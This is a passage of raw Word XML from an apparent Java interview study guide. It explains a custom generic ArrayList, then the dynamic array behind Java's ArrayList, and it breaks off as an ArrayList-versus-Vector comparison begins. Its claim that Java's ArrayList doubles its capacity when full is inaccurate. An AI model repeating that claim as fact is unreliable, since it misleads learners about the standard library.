      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116C5202" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Returns the current number of elements in the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0392C94F" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>isEmpty() Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3141801E" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Checks whether the list is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DCBD04" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>printList() Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074C0C30" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="785"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A helper method to print all elements in the list for testing purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7C36BA" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374C3445" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="786"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The example demonstrates creating a CustomArrayList with an initial capacity of 3. When 4 elements are added, the internal array gets resized to accommodate the additional element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017E0579" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA4B498" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="787"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resizable Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The custom ArrayList dynamically increases its capacity when it is full (doubling the capacity each time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB1098D" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="787"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Initial Capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The user can specify the initial capacity, which is useful for performance optimization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C865D3" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="787"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Generic Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This custom ArrayList is a generic class, allowing it to store any type of object (T).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF73662" w14:textId="77777777" w:rsidR="00EA7148" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA7148" w:rsidP="00DE068C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This implementation is a basic version of an ArrayList. It doesn't include advanced features such as remove(), clear(), or thread safety, but it demonstrates the fundamental resizing mechanism that powers Java's ArrayList.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5650C785" w14:textId="0FF529F6" w:rsidR="00324AE3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00324AE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="4EB4FA5A">
          <v:rect id="_x0000_i1505" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="429E0BD2" w14:textId="77777777" w:rsidR="00E67980" w:rsidRPr="00CE4B95" w:rsidRDefault="00E67980">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="_Toc196307642"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which data structure is used by ArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w14:paraId="693DF118" w14:textId="018B3553" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F79">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in Java uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamic array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also called a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resizable array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) as its underlying data structure. This dynamic array grows automatically when more space is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08571C55" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F7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Features of the Underlying Data Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E6B0F7" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ynamic Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1F9D2A" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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internal storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an ArrayList is a regular array (Object array), and the elements are stored in contiguous memory locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DD3F41" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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the array's capacity is exceeded, a new larger array is created, and the existing elements are copied into it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D08924" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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izing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1529EC78" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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the ArrayList reaches its capacity, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doubles the size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the internal array to accommodate more elements. This is done automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04616887" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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dex-based Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F3BE9D" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ecause it's backed by an array, an ArrayList provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constant-time random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to elements. Accessing an element by its index is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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE45005" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F7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tailed Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDEB87D" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78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an ArrayList is created, an array of a specific size (default: 10) is allocated internally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14588A19" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78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s elements are added, they are stored in the array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B6B022" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78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the array becomes full (i.e., its size equals its capacity), the ArrayList creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new, larger array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (usually double the size of the current array) and copies the existing elements into the new array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328FD408" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F7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52C5FBEA" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F7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rayList&lt;Integer&gt; list = new ArrayList&lt;&gt;(); // Internally uses a dynamic array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105E2504" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F7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In summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BEB83D" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79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uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamic array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as its underlying data structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAEAEF6" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79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izing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs when the array is full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117AF30E" w14:textId="77777777" w:rsidR="00713109" w:rsidRPr="00CE4B95" w:rsidRDefault="00713109" w:rsidP="00E85F79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79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provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fast random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to elements due to the contiguous memory allocation of arrays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD6B9EF" w14:textId="364DC230"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FD4159B">
          <v:rect id="_x0000_i1506" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="751ABD5F" w14:textId="77777777" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_Toc196307643"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between ArrayList and Vector?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
    </w:p>
    <w:p w14:paraId="1B5378ED" w14:textId="0C377EEA" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">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main difference between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Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java lies in their synchronization, growth mechanism, and overall performance. Here’s a detailed comparison:</w:t>
      </w:r>
    </w:p>
